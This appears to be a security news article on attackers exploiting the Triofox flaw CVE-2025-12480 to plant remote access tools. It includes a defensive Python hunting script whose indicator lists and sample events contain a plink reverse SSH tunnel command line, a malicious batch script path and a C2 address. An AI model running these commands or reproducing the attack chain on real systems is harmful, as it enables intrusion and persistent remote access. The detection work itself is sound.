

Ethical Hacking News

Hackers Exploit Triofox Flaw to Install Remote Access Tools via Antivirus Feature, Leaving Users Vulnerable to Malware and Privilege Escalation


Google's Mandiant Threat Defense team has observed attackers exploiting a critical vulnerability in Gladinet's Triofox file-sharing and remote access platform. The flaw lets an unauthenticated attacker reach the product's configuration pages, from which they created an admin account and abused the built-in antivirus feature to run arbitrary payloads on the server. Triofox users are advised to update to the latest version, audit admin accounts, and verify that the antivirus engine setting does not point at an unauthorized script or binary.

  • Hackers exploited a critical vulnerability (CVE-2025-12480, CVSS 9.1) in Gladinet's Triofox platform to bypass authentication and reach its configuration pages.
  • From there they uploaded and executed arbitrary payloads, leading to malware deployment and privilege escalation.
  • Google's Mandiant Threat Defense team observed a threat cluster tracked as UNC6485 weaponizing the flaw nearly a month after Gladinet had released a patch for it.
  • The attackers created a new native admin account called Cluster Admin and used it for follow-on activity, including code execution via the antivirus feature.
  • They deployed remote access programs (Zoho Assist and AnyDesk) to conduct reconnaissance, change passwords, and add accounts to the local Administrators and "Domain Admins" groups.
  • They tunnelled traffic to a command-and-control (C2) server over SSH on port 433 to sidestep detection.



    Hackers have recently exploited a critical vulnerability in Gladinet's Triofox file-sharing and remote access platform, allowing them to bypass authentication and access configuration pages. This vulnerability, tracked as CVE-2025-12480 (CVSS score: 9.1), enables attackers to upload and execute arbitrary payloads, resulting in malware infections and privilege escalation.

    Google's Mandiant Threat Defense team observed a threat cluster tracked as UNC6485 weaponizing the flaw as far back as August 24, 2025, nearly a month after Gladinet released a patch for it in version 16.7.10368.56560. This is not the first time this year that Triofox has faced exploitation; prior vulnerabilities, such as CVE-2025-30406 and CVE-2025-11371, have also been actively exploited.

    Having used the unauthenticated access to reach the configuration pages, the attackers created a new native admin account, Cluster Admin. They then logged in with that account and used it for follow-on activity, including code execution: malicious files were uploaded via the built-in antivirus feature.

    The attackers then set the antivirus engine path to a malicious batch script ("centre_report.bat"), which downloaded an installer for Zoho Unified Endpoint Management System (UEMS) from 84.200.80[.]252 and used it to deploy remote access programs, Zoho Assist and AnyDesk, on the host. The remote access afforded by Zoho Assist was then leveraged for reconnaissance, followed by attempts to change passwords for existing accounts and add them to the local Administrators and "Domain Admins" groups for privilege escalation.

    To sidestep detection, the threat actors downloaded Plink and PuTTY and set up an encrypted SSH tunnel to a command-and-control (C2) server over port 433, a non-standard port that is itself worth alerting on. The ultimate goal of this campaign remains unknown; Triofox users are advised to update to the latest version, audit admin accounts, and verify that the Triofox antivirus engine is not configured to execute unauthorized scripts or binaries.
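    The chain described above (new admin account, antivirus engine path changed to a script, script launched by Triofox, RAT installer fetched from the reported IP, privileged group changes, Plink tunnel on port 433) can be turned into hunting rules. The following Python script is an added example and is not code from the article, Mandiant or Gladinet. The event schema and all sample events are constructed for the demo; only the indicators (the "Cluster Admin" account, centre_report.bat, 84.200.80[.]252, Plink/PuTTY, port 433, Zoho UEMS/Assist, AnyDesk, the Administrators and "Domain Admins" groups) come from the article. The rule that a legitimate antivirus engine is an .exe under Program Files, and the Triofox parent-process name in the sample, are assumptions made here.

```python
import os
import re

# Indicators named in the article (UNC6485 / CVE-2025-12480 activity)
C2_IPS = {"84.200.80.252"}
TUNNEL_PORT = 433
TUNNEL_TOOLS = {"plink.exe", "putty.exe"}
SUSPICIOUS_ACCOUNTS = {"cluster admin"}
PRIV_GROUPS = {"domain admins", "administrators"}
RAT_MARKERS = ("anydesk", "zohoassist", "zoho assist", "uems")
SCRIPT_EXTS = {".bat", ".cmd", ".ps1", ".vbs"}
SCRIPT_RE = re.compile(r"\.(bat|cmd|ps1|vbs)\b")
# Assumption for this demo: a real scanner binary lives under Program Files.
ALLOWED_AV_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")


def _basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return re.split(r"[\\/]", path.strip().strip('"'))[-1].lower()


def av_engine_path_is_suspicious(path):
    """True when the configured antivirus engine path is a script, or a
    binary outside the usual program directories (demo heuristic)."""
    p = path.strip().strip('"').lower().replace("/", "\\")
    if not p:
        return False
    if os.path.splitext(p)[1] in SCRIPT_EXTS:
        return True
    return not p.startswith(ALLOWED_AV_DIRS)


def hunt(events):
    """Return (rule, detail) pairs for events matching the reported chain."""
    findings = []
    for e in events:
        kind = e.get("type")
        if kind == "account_created":
            if e.get("account", "").lower() in SUSPICIOUS_ACCOUNTS:
                findings.append(("suspicious_admin_account", e["account"]))
        elif kind == "group_member_added":
            if e.get("group", "").lower() in PRIV_GROUPS:
                findings.append(("privileged_group_change",
                                 f'{e.get("member")} -> {e["group"]}'))
        elif kind == "config_change":
            if (e.get("key") == "antivirus_engine_path"
                    and av_engine_path_is_suspicious(e.get("value", ""))):
                findings.append(("av_engine_points_to_script", e["value"]))
        elif kind == "process_start":
            image = _basename(e.get("image", ""))
            parent = _basename(e.get("parent_image", ""))
            cmd = e.get("cmdline", "").lower()
            if image in TUNNEL_TOOLS:
                port = re.search(r"-p\s+(\d+)", cmd)  # plink's -P <port>
                detail = f"{image} port {port.group(1)}" if port else image
                findings.append(("ssh_tunnel_tool", detail))
            # Script launched by the Triofox service (parent name assumed)
            if "triofox" in parent and (SCRIPT_RE.search(image) or SCRIPT_RE.search(cmd)):
                findings.append(("script_spawned_by_triofox", f"{parent} -> {image}"))
            if any(m in image or m in cmd for m in RAT_MARKERS):
                findings.append(("remote_access_tool_install", image))
        elif kind == "network_connect":
            if e.get("dst_ip") in C2_IPS:
                findings.append(("known_c2_ip", e["dst_ip"]))
            elif (e.get("dst_port") == TUNNEL_PORT
                  and _basename(e.get("image", "")) in TUNNEL_TOOLS):
                findings.append(("tunnel_on_port_433", f'{e.get("dst_ip")}:{TUNNEL_PORT}'))
    return findings


# Constructed sample telemetry (203.0.113.10 is a documentation address)
SAMPLE_EVENTS = [
    {"type": "account_created", "account": "Cluster Admin", "by": "SYSTEM"},
    {"type": "config_change", "key": "antivirus_engine_path",
     "value": r"C:\Windows\Temp\centre_report.bat"},
    {"type": "process_start", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files (x86)\Triofox\TriofoxService.exe",
     "cmdline": r'cmd.exe /c "C:\Windows\Temp\centre_report.bat"'},
    {"type": "process_start", "image": r"C:\Users\Public\UEMSAgent.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": "UEMSAgent.exe /silent"},
    {"type": "network_connect", "image": r"C:\Windows\System32\cmd.exe",
     "dst_ip": "84.200.80.252", "dst_port": 443},
    {"type": "group_member_added", "group": "Domain Admins", "member": "svc_backup"},
    {"type": "process_start", "image": r"C:\Users\Public\plink.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "plink.exe -ssh -P 433 -N -R 3389:127.0.0.1:3389 tunnel@203.0.113.10"},
    {"type": "network_connect", "image": r"C:\Users\Public\plink.exe",
     "dst_ip": "203.0.113.10", "dst_port": 433},
    # Benign noise that must not fire
    {"type": "account_created", "account": "jdoe", "by": "Administrator"},
    {"type": "config_change", "key": "antivirus_engine_path",
     "value": r"C:\Program Files\Windows Defender\MpCmdRun.exe"},
    {"type": "network_connect", "image": r"C:\Windows\System32\svchost.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
]

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}")
```

    In a real deployment the five event types map to Windows Security events 4720 (account created), 4728/4732 (member added to a global/local group), Sysmon event IDs 1 (process create) and 3 (network connect), and whatever audit trail records the Triofox antivirus setting change; the per-rule logic stays the same.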

    Exploitation began only after a fix was available, which underlines that patching Triofox promptly matters. It also shows what to monitor for on these servers: newly created admin accounts, changes to the antivirus engine path, and remote-access or tunnelling tools appearing on the host. Prompt response limits the damage of an incident, but keeping the platform patched and watched is what prevents one.

    Related Information:
  • https://www.ethicalhackingnews.com/articles/Hackers-Exploit-Triofox-Flaw-to-Install-Remote-Access-Tools-via-Antivirus-Feature-Leaving-Users-Vulnerable-to-Malware-and-Privilege-Escalation-ehn.shtml

  • https://thehackernews.com/2025/11/hackers-exploiting-triofox-flaw-to.html

  • https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480


  • Published: Mon Nov 10 15:26:56 2025 by llama3.2 3B Q4_K_M

    © Ethical Hacking News. All rights reserved.